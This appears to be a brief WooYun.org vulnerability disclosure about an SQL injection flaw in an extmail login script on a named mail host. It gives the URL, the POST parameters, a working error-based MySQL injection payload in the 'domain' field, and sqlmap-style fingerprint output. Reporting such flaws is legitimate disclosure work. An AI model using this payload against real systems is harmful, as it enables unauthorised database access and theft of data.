WooYun.org

存在post注入漏洞
url：http://smtp.mop.com/extmail/cgi/index.cgi
param：password=123456&domain=smtp.mop.com&username=1
---
Place: POST
Parameter: domain
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: password=123456&domain=smtp.mop.com' AND (SELECT 4389 FROM(SELECT C
OUNT(*),CONCAT(0x3a6174703a,(SELECT (CASE WHEN (4389=4389) THEN 1 ELSE 0 END)),0
x3a6577623a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x
)a) AND 'JIsy'='JIsy&username=1
---
[03:59:26] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.4
back-end DBMS: MySQL 5.0